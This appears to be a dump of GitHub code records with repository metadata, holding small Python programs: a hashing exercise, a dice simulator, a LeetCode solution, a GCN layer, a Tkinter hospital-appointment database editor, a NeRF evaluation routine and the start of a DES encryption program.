+{"seq_id":"27175877906","text":"#!/usr/bin/env python3\n\"\"\"\n2019-03-01 Hashing Assignment\n\"\"\"\n\nimport logging\nfrom itertools import chain\nfrom typing import NamedTuple, List, Iterator\n\n\nclass Entry(NamedTuple):\n present_as_positive_value: bool\n present_as_negative_value: bool\n\n\nclass TrivialSet:\n def __init__(self, max_range: int):\n self.array: List[Entry] = [Entry(present_as_positive_value=False, present_as_negative_value=False)\n for _ in range(max_range + 1)]\n\n def add(self, item):\n present_as_positive_value, present_as_negative_value = self.array[item]\n if item >= 0:\n present_as_positive_value = True\n else:\n present_as_negative_value = True\n self.array[abs(item)] = Entry(present_as_positive_value, present_as_negative_value)\n\n def discard(self, item):\n present_as_positive_value, present_as_negative_value = self.array[item]\n if item >= 0:\n present_as_positive_value = False\n else:\n present_as_negative_value = False\n self.array[abs(item)] = Entry(present_as_positive_value, present_as_negative_value)\n\n def __contains__(self, item):\n if item >= 0:\n return self.array[abs(item)].present_as_positive_value\n else:\n return self.array[abs(item)].present_as_negative_value\n\n def __iter__(self) -> Iterator[int]:\n negative_items = (-index for index, entry in enumerate(self.array) if entry.present_as_negative_value)\n positive_items = (index for index, entry in enumerate(self.array) if entry.present_as_positive_value)\n\n return chain(negative_items, positive_items)\n\n def __str__(self):\n return '{%s}' % ', '.join(map(str, iter(self)))\n\n def __repr__(self):\n return f'{self.__class__.__name__}({str(self)})'\n\n\nif __name__ == '__main__':\n import argparse\n import sys\n from random import randint\n\n parser = argparse.ArgumentParser(description='Sort a random array')\n parser.add_argument('--max-range', metavar='MAX', type=int, default=10)\n parser.add_argument('--test-count', metavar='MAX', type=int, default=10)\n args = parser.parse_args()\n\n logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)\n\n trivial_set = TrivialSet(max_range=args.max_range)\n\n for _ in range(args.max_range):\n num = randint(-args.max_range, args.max_range)\n logging.debug(f'Adding value: {num}')\n trivial_set.add(num)\n logging.debug(f'Set after add: {trivial_set}')\n","repo_name":"0x326/academic-code-portfolio","sub_path":"2016-2021 Miami University/CSE 564 Algorithms/Coding Assignments/src/hashing.py","file_name":"hashing.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"15691727129","text":"\n'''\ndice simulator\nauthor: Samson Wang\ndata: 2018-04-16\n'''\n\nimport random\n\n# 最大最小值\nnum_min = 1\nnum_max = 6\n\nis_need_exit = False\n\nwhile not is_need_exit :\n\tprint(\"==dice simulator==\")\n\tprint(\"dice is rolling!\\n min=%d, max=%d\" % (num_min, num_max))\n\tnum_rand = random.randint(num_min, num_max)\n\tprint(\" rand number\", num_rand)\n\n\t# ask whether next roll is needed\n\twhile True:\n\t\tanswer = input(\"roll dice again? 
(y/n): \")\n\t\tif (answer == \"n\") :\n\t\t\tis_need_exit = True\n\t\t\tbreak;\n\t\telif (answer == \"y\") :\n\t\t\tis_need_exit = False\n\t\t\tbreak;\n\t\telse :\n\t\t\tprint(\"please input \\\"y\\\" or \\\"n\\\" !!\")\n\t\t\n\t\n\n\n","repo_name":"samsonwang/ToyPython","sub_path":"PlayGround/01DiceSimulator/01DiceSimulator.py","file_name":"01DiceSimulator.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42405756757","text":"'''\n https://leetcode.com/problems/detect-squares/\n\n 2013. Detect Squares\n\n You are given a stream of points on the X-Y plane. Design an algorithm that:\n - Adds new points from the stream into a data structure. Duplicate points are allowed and should be treated as different points.\n - Given a query point, counts the number of ways to choose three points from the data structure such that the three points and the query point form an axis-aligned square with positive area.\n An axis-aligned square is a square whose edges are all the same length and are either parallel or perpendicular to the x-axis and y-axis.\n\n Implement the DetectSquares class:\n\n - DetectSquares() Initializes the object with an empty data structure.\n - void add(int[] point) Adds a new point point = [x, y] to the data structure.\n - int count(int[] point) Counts the number of ways to form axis-aligned squares with point point = [x, y] as described above.\n'''\n\n'''\n Before adding memo, it was correct by TLE. After adding memo, it got accepted.\n'''\n\n\nclass DetectSquares:\n xCoordMap = None\n yCoordMap = None\n pointsCounts = None\n\n def __init__(self):\n self.xCoordMap = {}\n self.yCoordMap = {}\n self.pointsCounts = {}\n\n def add(self, point: [int]) -> None:\n xCoord, yCoord = point[0], point[1]\n\n if xCoord not in self.xCoordMap:\n self.xCoordMap[xCoord] = []\n\n self.xCoordMap[xCoord].append((xCoord, yCoord))\n\n if yCoord not in self.yCoordMap:\n self.yCoordMap[yCoord] = []\n\n self.yCoordMap[yCoord].append((xCoord, yCoord))\n\n if (xCoord, yCoord) not in self.pointsCounts:\n self.pointsCounts[(xCoord, yCoord)] = 0\n\n self.pointsCounts[(xCoord, yCoord)] += 1\n\n def count(self, point: [int]) -> int:\n xCoord, yCoord = point[0], point[1]\n\n # first we need to find all the points with same xCoord as the point\n # and all the points with the same yCoord as the point\n if xCoord in self.xCoordMap and yCoord in self.yCoordMap:\n xCoordPoints = self.xCoordMap[xCoord]\n yCoordPoints = self.yCoordMap[yCoord]\n\n # now we need to find which of the xCoordPoints and yCoordPoints are equidistant from our point\n xCoordDistances = {}\n yCoordDistances = {}\n\n for otherPoint in xCoordPoints:\n # the distance from (xCoord, yCoord) and a point in xCoordPoints is equal to abs(yCoord and otherYCoord)\n distance = int(abs(otherPoint[1] - yCoord))\n\n if distance not in xCoordDistances:\n xCoordDistances[distance] = []\n\n xCoordDistances[distance].append(otherPoint)\n\n for otherPoint in yCoordPoints:\n # the distance from (xCoord, yCoord) and a point in yCoordPoints is equal to abs(xCoord and otherXCoord)\n distance = int(abs(otherPoint[0] - xCoord))\n\n if distance not in yCoordDistances:\n yCoordDistances[distance] = []\n\n yCoordDistances[distance].append(otherPoint)\n\n # counts the total number of squares that can be formed from given point\n totalSquares = 0\n\n # because there could be duplicate points, maybe if we've already seen the point p1 before, we can memorize\n # its results 
instead of recomputing for every p2\n memo = {}\n\n # now that we mapped every other point to its distance from our point, we need to check all the points in xCoordDistances\n # and yCoordDistances that have same distance from our point\n for distance in xCoordDistances:\n if distance in yCoordDistances:\n # get these pairs together and see if they can form a square\n for p1 in xCoordDistances[distance]:\n if p1 in memo:\n totalSquares += memo[p1]\n else:\n memo[p1] = 0\n\n for p2 in yCoordDistances[distance]:\n fourthPoint = None\n\n # first we need to see in which quadrant with point in its center are we attempting to create the triangle\n if p2[0] < xCoord and p1[1] > yCoord:\n # quadrant 1 => look for (i-d, j+d)\n fourthPoint = (xCoord - distance, yCoord + distance)\n elif p2[0] > xCoord and p1[1] > yCoord:\n # quadrant 2 => look for (i+d, j+d)\n fourthPoint = (xCoord + distance, yCoord + distance)\n elif p2[0] > xCoord and p1[1] < yCoord:\n # quadrant 3 => look for (i+d, j-d)\n fourthPoint = (xCoord + distance, yCoord - distance)\n elif p2[0] < xCoord and p1[1] < yCoord:\n # quadrant 4 => look for (i-d, j-d)\n fourthPoint = (xCoord - distance, yCoord - distance)\n\n if fourthPoint is not None and fourthPoint in self.pointsCounts:\n totalSquares += self.pointsCounts[fourthPoint]\n memo[p1] += self.pointsCounts[fourthPoint]\n\n return totalSquares\n else:\n return 0\n\n\n# Your DetectSquares object will be instantiated and called as such:\nobj = DetectSquares()\n\n# commands = [\"add\", \"add\", \"add\", \"count\", \"count\", \"add\", \"count\"]\n# input = [[[3, 10]], [[11, 2]], [[3, 2]], [[11, 10]], [[14, 8]], [[11, 2]], [[11, 10]]]\n\n# commands = [\"count\"]\n# input = [[[11, 10]]]\n\ncommands = [\"add\", \"add\", \"add\"]\ninput = [[[3, 10]], [[11, 2]], [[3, 2]]]\n\nfor i in range(0, len(commands)):\n command = commands[i]\n\n if command == \"add\":\n obj.add(input[i][0])\n elif command == \"count\":\n print(obj.count(input[i][0]))\n","repo_name":"hnc01/online-judge","sub_path":"LeetCode/top_google/medium/detect_squares.py","file_name":"detect_squares.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33633015773","text":"import tensorflow as tf\nfrom typing import Tuple\n\n\n\nclass GCNSkipLayer(tf.keras.layers.Layer):\n def __init__(self, units: int, activation=None, kernel_initializer=\"glorot_uniform\", dtype=tf.float32):\n super(GCNSkipLayer, self).__init__(dtype=dtype)\n\n self.units = int(units)\n self.activation = tf.keras.activations.get(activation)\n self.kernel_initializer = tf.keras.initializers.get(kernel_initializer)\n\n def build(self, input_shape):\n last_dim_nodes = tf.TensorShape(input_shape[1])[-1]\n last_dim_skip = tf.TensorShape(input_shape[2])[-1]\n\n self.kernel_nodes = self.add_weight(\n 'kernel_nodes',\n shape=[last_dim_nodes, self.units],\n initializer=self.kernel_initializer,\n dtype=self.dtype,\n trainable=True)\n self.kernel_skip = self.add_weight(\n 'kernel_skip',\n shape=[last_dim_skip, self.units],\n initializer=self.kernel_initializer,\n dtype=self.dtype,\n trainable=True)\n self.built = True\n\n def call(self, inputs: Tuple[tf.SparseTensor,tf.Tensor,tf.Tensor], training=None, mask=None):\n adj, nodes, skip_input = inputs\n kernel_branch = tf.matmul(tf.sparse.sparse_dense_matmul(adj,nodes),self.kernel_nodes)\n skip_branch = tf.matmul(skip_input,self.kernel_skip)\n return self.activation(kernel_branch + 
skip_branch)","repo_name":"Rufaim/EvolveGCN","sub_path":"models/layers/gcn_skip_layer.py","file_name":"gcn_skip_layer.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"81"} +{"seq_id":"3370860098","text":"import os\r\nimport csv\r\n\r\n\r\nprint(\"Create a new folder? y/n: \")\r\nanswer = input()\r\nif (answer == \"y\"):\r\n print(\"Enter the name of a folder: \")\r\n folder_name_input = input()\r\n\r\n current_directory = os.getcwd()\r\n path = current_directory + f\"\\\\{folder_name_input}\"\r\n\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n\r\n file_name = \"user_folder_data.csv\"\r\n csv_path = path + f\"\\\\{file_name}\"\r\n\r\n if not os.path.exists(csv_path):\r\n # If the file doesn't exist, create a new one with a header row\r\n with open(csv_path, 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n writer.writerow(['item_name'])\r\n\r\n # Check if 'item_name' row exists\r\n item_name_exists = False\r\n with open(csv_path, 'r', newline='') as file:\r\n reader = csv.reader(file)\r\n header = next(reader, None)\r\n if header:\r\n for column in header:\r\n if column == 'item_name':\r\n item_name_exists = True\r\n break\r\n\r\n print(\"Add an item? y/n: \")\r\n answer = input()\r\n if answer == \"y\":\r\n with open(csv_path, 'a', newline='') as file:\r\n writer = csv.writer(file)\r\n if not item_name_exists:\r\n writer.writerow(['item_name'])\r\n print(\"Enter the name of an item: \")\r\n user_input = input()\r\n writer.writerow([user_input])\r\n","repo_name":"02Ken20/Suadeo","sub_path":"FolderSystem.py","file_name":"FolderSystem.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74179389386","text":"\"\"\" \nScript to check for non-legal Unicode-IPA characters.\n\nFor use with Python version 3 or greater.\n\n\"\"\"\n\nclass UnicodeIpaTester:\n def __init__(self):\n self.hash = {}\n self.data = open(\"unicode_ipa.csv\", \"r\")\n header = self.data.readline()\n for line in self.data:\n line = line.strip()\n tokens = line.split(\"\\t\")\n decimal = tokens[2].strip()\n decimal = int(decimal)\n if not decimal in self.hash:\n self.hash[decimal] = 1\n else:\n self.hash[decimal] += 1\n\n def compare(self, inputhash):\n c = 0\n for k, v in inputhash.items():\n if not k in self.hash:\n print(\"NON-IPA: \", k, v, chr(k))\n c += 1\n if not c == 0:\n print(\"total: \", c)\n\n def compare_string(self, decimal):\n if not decimal in self.hash:\n return decimal\n\nif __name__==\"__main__\":\n import sys, unicodedata\n uipa = UnicodeIpaTester()\n # uipa.compare({58:1, 76:1, 77:1, 7725:2})\n\n test_hash = {}\n file = open(sys.argv[1], \"r\")\n for line in file:\n line = line.strip()\n if line.startswith(\"#\"):\n continue\n\n for char in line:\n if char == \" \":\n continue\n if not char == \"\":\n decimal = uipa.compare_string(ord(char))\n if not decimal == None:\n # print(\"NON-IPA: \", decimal, chr(decimal))\n if not decimal in test_hash:\n test_hash[decimal] = 1\n else:\n test_hash[decimal] += 1\n\n if len(test_hash) == 0:\n print(\"\\nHooray! 
No illegal Unicode IPA characters were found in the input: \"+sys.argv[1]+\"\\n\")\n else:\n print(\"\\nThe following table lists the illegal Unicode IPA characters found in the input: \"+sys.argv[1]+\"\\n\")\n print(\"Decimal\"+\"\\t\"+\"Glyph\"+\"\\t\"+\"Occurrences\") \n for k, v in test_hash.items():\n print(str(k)+\"\\t\"+chr(k)+\"\\t\"+str(v))\n print(\"\\n\")\n","repo_name":"bambooforest/unicodeipa","sub_path":"check_unicode_ipa.py","file_name":"check_unicode_ipa.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"23420791060","text":"#armaan 2110994755\nfrom tkinter import *\nimport tkinter.messagebox #importing librariries such as messagebox used for displaying messages\nimport sqlite3\nfrom PIL import ImageTk,Image #ImageTk module contains support to create and modify Tkinter BitmapImage and PhotoImage objects from\n#PIL images used everywhere Tkinter expects an image object\nconn = sqlite3.connect('database1.db')\nc = conn.cursor()\n#this file is created so that the user can update the data in accordance to their need if they feel it needs to be edited\nclass Application:\n def __init__(self, master):\n self.master = master\n self.image=ImageTk.PhotoImage(Image.open(\"hospital5.jpg\"))\n self.panel=Label(master,image=self.image)\n self.panel.pack()\n self.heading = Label(master, text=\"Update Appointments\", fg='steelblue', font=('arial 40 bold'))\n self.heading.place(x=150, y=0)\n\n self.name = Label(master, text=\"Enter Patient's Name\", font=('arial 18 bold'))\n self.name.place(x=0, y=80)\n\n self.namenet = Entry(master, width=30,bd=3) #user inputs the name to search for the data base\n self.namenet.place(x=280, y=80)\n#search button enables the searching of the data base in accordance to the name \n self.search = Button(master, text=\"Search\", width=12, height=1, bg='steelblue',bd=3,command=self.search_db)\n self.search.place(x=330, y=120)\n\n\n def search_db(self):\n self.input = self.namenet.get() #taking the user input for the name by the patient\n\n sql = \"SELECT * FROM appointment WHERE name LIKE ?\" #select sql query used and stored in the sql variable\n self.res = c.execute(sql, (self.input,))\n for self.row in self.res:\n self.name1 = self.row[1]\n self.age = self.row[2]\n self.gender = self.row[3]\n self.address = self.row[4]\n self.phone = self.row[5]\n self.time = self.row[6]\n#label used for displaying the name, age gender etc when the patient searches \n self.uname = Label(self.master, text=\"Patient's Name\", font=('arial 18 bold'))\n self.uname.place(x=0, y=150)\n\n self.uage = Label(self.master, text=\"Age\", font=('arial 18 bold'))\n self.uage.place(x=0, y=190)\n\n self.ugender = Label(self.master, text=\"Gender\", font=('arial 18 bold'))\n self.ugender.place(x=0, y=230)\n\n self.uaddress = Label(self.master, text=\"Address\", font=('arial 18 bold'))\n self.uaddress.place(x=0, y=270)\n\n self.uphone = Label(self.master, text=\"Phone Number\", font=('arial 18 bold'))\n self.uphone.place(x=0, y=310)\n\n self.utime = Label(self.master, text=\"Appointment time\", font=('arial 18 bold'))\n self.utime.place(x=0, y=350)\n\n #entry widget for name, age , gender etc\n self.ent1 = Entry(self.master, width=30,bd=3) #parameters include the parent window and width, breadth of the widget\n self.ent1.place(x=300, y=150) #placing in accordance to the specified coordinates\n self.ent1.insert(END, str(self.name1)) #inserting the string \n\n self.ent2 = Entry(self.master, 
width=30,bd=3)\n self.ent2.place(x=300, y=190)\n self.ent2.insert(END, str(self.age))\n\n self.ent3 = Entry(self.master, width=30,bd=3)\n self.ent3.place(x=300, y=230)\n self.ent3.insert(END, str(self.gender))\n\n self.ent4 = Entry(self.master, width=30,bd=3)\n self.ent4.place(x=300, y=270)\n self.ent4.insert(END, str(self.address))\n\n self.ent5 = Entry(self.master, width=30,bd=3)\n self.ent5.place(x=300, y=310)\n self.ent5.insert(END, str(self.phone))\n\n self.ent6 = Entry(self.master, width=30,bd=3)\n self.ent6.place(x=300, y=350)\n self.ent6.insert(END, str(self.time))\n\n self.update = Button(self.master, text=\"Update\", width=20, height=2, bg='lightblue',bd=3, command=self.update_db)\n self.update.place(x=400, y=390)\n\n self.delete = Button(self.master, text=\"Delete\", width=20, height=2, bg='red',bd=3, command=self.delete_db)\n self.delete.place(x=150, y=390)\n def update_db(self): #this method takes in the user input and uses the update sql query to update the data by the user\n\n self.var1 = self.ent1.get()\n self.var2 = self.ent2.get() \n self.var3 = self.ent3.get() \n self.var4 = self.ent4.get() \n self.var5 = self.ent5.get() \n self.var6 = self.ent6.get() \n#update query used fro name, age , gender etc\n query = \"UPDATE appointment SET name=?, age=?, gender=?, address=?, phone=?, time=? WHERE name LIKE ?\"\n c.execute(query, (self.var1, self.var2, self.var3, self.var4, self.var5, self.var6, self.namenet.get(),))\n conn.commit()\n tkinter.messagebox.showinfo(\"Updated\", \"Successfully Updated.\")\n def delete_db(self): #method uses the delete query and executes it \n sql2 = \"DELETE FROM appointment WHERE name LIKE ?\"\n c.execute(sql2, (self.namenet.get(),))\n conn.commit()\n tkinter.messagebox.showinfo(\"Success\", \"Deleted Successfully\")\n self.ent1.destroy()\n self.ent2.destroy()\n self.ent3.destroy()\n self.ent4.destroy()\n self.ent5.destroy()\n self.ent6.destroy()\n\nroot = Tk()\nb = Application(root)\nroot.geometry(\"800x500+0+0\")\nroot.resizable(False, False)\nroot.mainloop()\n","repo_name":"paradox20029/sit_221_task11.2","sub_path":"Hospital_management-python_tkinter-master/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18134031931","text":"from .consultas import *\n\n\ndef crear_dataSurvey(id_encuesta):\n datos_encuesta_creada = obtener_encuesta_creada(id_encuesta)\n questions = []\n # Se generan ordenados id_pregunta y enunciado por numero\n cantidad_total_preguntas = len(datos_encuesta_creada[\"ids_preguntas_alternativas\"])\n indexOp = 0\n for i in range(0,cantidad_total_preguntas):\n data = {\n \"id\": datos_encuesta_creada[\"ids_preguntas_alternativas\"].pop(0),\n \"type\": \"alternativa\",\n \"statement\": datos_encuesta_creada[\"enunciados_preguntas_alternativas\"].pop(0),\n \"alternatives\": []\n }\n cantidad_alternativas = datos_encuesta_creada[\"cantidad_opciones_por_pregunta\"].pop(0)\n j = 0\n while j < cantidad_alternativas:\n dataOption = {\n \"id\": datos_encuesta_creada[\"ids_opciones\"][indexOp],\n \"textAlt\": datos_encuesta_creada[\"strings_opciones\"][indexOp]\n }\n data[\"alternatives\"].append(dataOption)\n j += 1\n indexOp += 1\n questions.append(data)\n\n survey = db.session.query(Encuesta).filter_by(id_encuesta=id_encuesta).first()\n\n fecha_fin_aux = \"\"\n if survey.fecha_fin == None:\n fecha_fin_aux = (datetime.now() + timedelta(days=7)).strftime(\"%d-%m-%Y\")\n else:\n fecha_fin_aux = 
survey.fecha_fin.strftime(\"%d-%m-%Y\")\n \n dataSurvey = {\n \"id\": id_encuesta,\n \"title\": survey.titulo,\n \"description\": survey.descripcion,\n \"questions\": questions, \n \"end_date\": fecha_fin_aux,\n \"mail_subject\": survey.asunto_mail,\n \"mail_body\": survey.mensaje_mail,\n \"asigned\" : survey.total_asignados\n }\n\n return dataSurvey\n","repo_name":"mellokx/Proyecto-Semestral-IS2","sub_path":"application/estructuraInterfaz.py","file_name":"estructuraInterfaz.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"17746276497","text":"#!/usr/bin/env python3\n\nimport time\nimport math\nimport random\n\nfrom zencad import *\nimport zencad.assemble\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\nCTRWIDGET = None\nSLD0 = None\nSLD1 = None\n\nBALL_POSITION = [0, 0]\nBALL_SPEED_NORMAL = math.sqrt(150**2 * 2)\nBALL_SPEED = [\n BALL_SPEED_NORMAL*math.cos(deg(45)),\n BALL_SPEED_NORMAL*math.cos(deg(45))]\n\nBOX_WIDTH = 300\nBOX_LENGTH = 500\nPLAYER_OFF = 40\nT = 10\n\n\nclass Slider(QSlider):\n def __init__(self):\n super().__init__(Qt.Horizontal)\n self.setRange(-5000, 5000)\n self.setValue(0)\n self.setSingleStep(1)\n\n _value = QSlider.value\n\n def value(self):\n return self._value(self) / 10000 * (BOX_WIDTH-80)\n\n\nclass player(zencad.assemble.unit):\n def __init__(self):\n super().__init__()\n self.add(box(80, 10, 10, center=True))\n\n\nclass ball(zencad.assemble.unit):\n def __init__(self):\n super().__init__()\n self.add(sphere(5))\n\n\nplayer_one = player()\nplayer_two = player()\nball = ball()\n\nBOX = box(BOX_WIDTH+T*2, BOX_LENGTH+T*2+PLAYER_OFF*2, 20, center=True) - \\\n box(BOX_WIDTH, BOX_LENGTH+PLAYER_OFF*2, 20, center=True)\n\ndisp(player_one)\ndisp(player_two)\ndisp(ball)\ndisp(BOX)\n\n\ndef change_angle():\n global BALL_SPEED\n\n angle = math.atan2(BALL_SPEED[1], BALL_SPEED[0])\n angle += random.uniform(-0.2, 0.2)\n\n BALL_SPEED = [math.cos(angle) * BALL_SPEED_NORMAL,\n math.sin(angle) * BALL_SPEED_NORMAL]\n\n\ndef preanimate(wdg, animate_thread):\n global CTRWIDGET, SLD0, SLD1\n CTRWIDGET = QWidget()\n layout = QVBoxLayout()\n\n SLD0 = Slider()\n SLD1 = Slider()\n\n layout.addWidget(SLD1)\n layout.addWidget(SLD0)\n\n CTRWIDGET.setLayout(layout)\n CTRWIDGET.setWindowFlags(Qt.WindowStaysOnTopHint | Qt.Dialog)\n CTRWIDGET.show()\n\n\nstime = time.time()\nlasttime = stime\n\n\ndef animate(wdg):\n global BALL_POSITION\n global lasttime\n curtime = time.time()\n DELTA = curtime - lasttime\n lasttime = curtime\n\n player_one_pos = SLD0.value()\n player_one_location = translate(SLD0.value(), -BOX_LENGTH/2-5, 0)\n player_one.relocate(player_one_location, view=True)\n\n player_two_pos = SLD1.value()\n player_two_location = translate(SLD1.value(), BOX_LENGTH/2+5, 0)\n player_two.relocate(player_two_location, view=True)\n\n BALL_POSITION[0] += BALL_SPEED[0] * DELTA\n BALL_POSITION[1] += BALL_SPEED[1] * DELTA\n\n if BALL_POSITION[0] > BOX_WIDTH/2:\n BALL_SPEED[0] = - BALL_SPEED[0]\n BALL_POSITION[0] = BOX_WIDTH/2\n change_angle()\n\n if BALL_POSITION[0] < -BOX_WIDTH/2:\n BALL_SPEED[0] = - BALL_SPEED[0]\n BALL_POSITION[0] = -BOX_WIDTH/2\n change_angle()\n\n if BALL_POSITION[1] > BOX_LENGTH/2:\n BALL_SPEED[1] = - BALL_SPEED[1]\n BALL_POSITION[1] = BOX_LENGTH/2\n if abs(player_two_pos - BALL_POSITION[0]) > 40:\n BALL_POSITION = [0, 0]\n change_angle()\n\n if BALL_POSITION[1] < -BOX_LENGTH/2:\n BALL_SPEED[1] = - BALL_SPEED[1]\n 
BALL_POSITION[1] = -BOX_LENGTH/2\n if abs(player_one_pos - BALL_POSITION[0]) > 40:\n BALL_POSITION = [0, 0]\n change_angle()\n\n ball.relocate(translate(BALL_POSITION[0], BALL_POSITION[1]), view=True)\n\n\ndef close_handle():\n CTRWIDGET.close()\n\n\nshow(animate=animate, preanimate=preanimate, close_handle=close_handle)\n","repo_name":"mirmik/zencad","sub_path":"zencad/examples/MiniGames/tennis.py","file_name":"tennis.py","file_ext":"py","file_size_in_byte":3384,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"81"} +{"seq_id":"6350201708","text":"import copy\r\nimport torch\r\nimport utils.multigpu as multigpu\r\nimport utils.utils as ut\r\nimport utils.volumrender as render\r\nimport numpy as np\r\nimport option as op\r\nfrom tqdm import tqdm\r\ndef eval_nerf_fine(ImgTensor,trainparams,camparams,modelout,savepath=None):\r\n numpic,H,W=ImgTensor.shape[0:3]\r\n\r\n ml,emb_list,coastRayTAlll,coastSigmaAlll,hashcodinglist=modelout\r\n\r\n numgpu=trainparams['numgpu']\r\n\r\n try:\r\n with torch.no_grad():\r\n meanparam=multigpu.meanParams(ml)\r\n n=0\r\n for para in trainparams['model'].parameters():\r\n para.copy_(meanparam[n])\r\n n=n+1\r\n torch.save(trainparams['model'].state_dict(),savepath+\"model_fine.p\")\r\n except:\r\n print(\"model to cpu error\")\r\n\r\n\r\n\r\n if trainparams['if_hash']:\r\n try:\r\n with torch.no_grad():\r\n n=0\r\n meanparam=multigpu.meanParams(emb_list)\r\n for para in trainparams['emb'].parameters():\r\n para.copy_(meanparam[n])\r\n n=n+1\r\n torch.save(trainparams['emb'].state_dict(),savepath+\"model_fine_emb.p\")\r\n except:\r\n print(\"embedding to cpu error\")\r\n\r\n\r\n numeval=10\r\n index=torch.ceil(torch.linspace(0,numpic-1,numeval)).to(torch.int)\r\n import matplotlib.pyplot as plt\r\n\r\n try:\r\n with torch.no_grad():\r\n print(\"saving colormap\")\r\n for i in range(numeval):\r\n imIndex=index[i]\r\n currentImg=ImgTensor[imIndex,...].to(torch.float32)\r\n currentr=camparams['r'][imIndex,...]\r\n currentt=camparams['t'][imIndex,...]\r\n\r\n rayo,rayd=ut.getRayKK(currentr,currentt,H,W,camparams['k'])\r\n\r\n rayo=ut.centralCrop(rayo[np.newaxis,...],scale=trainparams['centralcrop'])[0,...]\r\n rayd=ut.centralCrop(rayd[np.newaxis,...],scale=trainparams['centralcrop'])[0,...]\r\n currentImg=ut.centralCrop(currentImg[np.newaxis,...],scale=trainparams['centralcrop'])[0,...]\r\n\r\n rayo=rayo.permute(2,0,1)\r\n rayd=rayd.permute(2,0,1)\r\n currentImg=currentImg.permute(2,0,1)\r\n\r\n\r\n\r\n rayol=multigpu.datatoGPU(multigpu.splitImgToPatch(rayo,numgpu)[0],numgpu) # split on cpu\r\n raydl=multigpu.datatoGPU(multigpu.splitImgToPatch(rayd,numgpu)[0],numgpu)\r\n splitHl=multigpu.datatoGPU(multigpu.splitImgToPatch(rayd,numgpu)[1],numgpu)\r\n splitWl=multigpu.datatoGPU(multigpu.splitImgToPatch(rayd,numgpu)[2],numgpu)\r\n coastSigmaAllll=multigpu.datatoGPU(multigpu.splitImgToPatch(coastSigmaAlll[imIndex,...].permute(2,0,1),numgpu)[0],numgpu)\r\n for m in range(len(coastSigmaAllll)):\r\n coastSigmaAllll[m]=coastSigmaAllll[m].permute(1,2,0)\r\n\r\n\r\n colormap=torch.tensor(())\r\n depth=torch.tensor(())\r\n \r\n for j in range(numgpu): \r\n flatPoints,flatrayd,newRayT=render.getfinepoints(coastRayTAlll[imIndex,...],sigma=coastSigmaAllll[j],rayO=rayol[j].permute(1,2,0),rayD=raydl[j].permute(1,2,0),numFine=camparams['numFinesam'])\r\n\r\n 
coastraw=render.batch_enc(enc_hash=hashcodinglist[j],enc_freq=trainparams['enc_freq'],flatpoints=flatPoints,flatrayd=flatrayd,fn=ml[j],if_hash=trainparams['if_hash'],chunkSize=trainparams['chunkSize'])\r\n\r\n sigma,rgb=render.raw2rgb(coastraw,splitHl[j],splitWl[j],newRayT.shape[-1])\r\n\r\n colormapd,depthd,accd=render.rgb2output(sigma=sigma,rgb=rgb,rayT=newRayT)\r\n colormap=torch.concat((colormap,colormapd.to(torch.device(\"cpu\"))),dim=-2)\r\n depth=torch.concat((depth,depthd.to(torch.device(\"cpu\"))),dim=-1)\r\n\r\n \r\n colormap=colormap.detach().numpy()\r\n depth=depth.detach().numpy()\r\n currentImg=currentImg.permute(1,2,0).detach().numpy()\r\n plt.imsave(savepath+\"color\"+str(i)+\".png\",colormap/np.max(colormap))\r\n plt.imsave(savepath+\"depth\"+str(i)+\".png\",depth/np.max(depth))\r\n plt.imsave(savepath+\"gt\"+str(i)+\".png\",currentImg/np.max(currentImg))\r\n op.saveparams([trainparams,camparams],savepath)\r\n \r\n print(\"save pic done\")\r\n except Exception as e:\r\n #print('错误类型是',e.__class__.__name__)#except:#jia\r\n print('error saving:',e.__class__.__name__,e) #continue#jia\r\n\r\n","repo_name":"pulangk97/nerfPytorch","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"40310402687","text":"#DES.py @author Kai Barclay 2020\n#main method here\n#run this as: python3 DES.py\n\nfrom user import User\nfrom user import *\nfrom key import Key\nfrom mafs import Mafs\nfrom bits import *\nimport sys\n\ndef main(): #program flow\n print(\"Welcome to DES.\")\n end = False\n while end == False:\n i = User()\n if i.isEncryption() == True: #Encrypting\n print(\"Encrypting....\")\n print(\"Message: \" + i.getMessage())\n if i.isSingle() == True: #single DES\n print(\"Key: \" + i.getK1())\n e = DES(i.getMessage(), i.getK1())\n print(\"Cipher: \" + e)\n end = option1(e, i)\n else: #triple DES\n print(\"Key 1: \" + i.getK1())\n print(\"Key 2: \" + i.getK2())\n e = DES3(i.getMessage(), i.getK1(), i.getK2())\n print(\"Cipher: \" + e)\n end = option1(e, i)\n else: #Decrypting\n print(\"Decrypting....\")\n print(\"Cipher Text: \" + i.getMessage())\n if i.isSingle() == True: #single DES\n print(\"Key: \" + i.getK1())\n u = unDES(i.getMessage(), i.getK1())\n print(\"Plain Text: \" + toChar(u))\n end = option2()\n else: #triple DES\n print(\"Key 1: \" + i.getK1())\n print(\"Key 2: \" + i.getK2())\n e = DES3(i.getMessage(), i.getK1(), i.getK2())\n print(\"Cipher: \" + e)\n end = option2()\n\n\ndef DES(m, 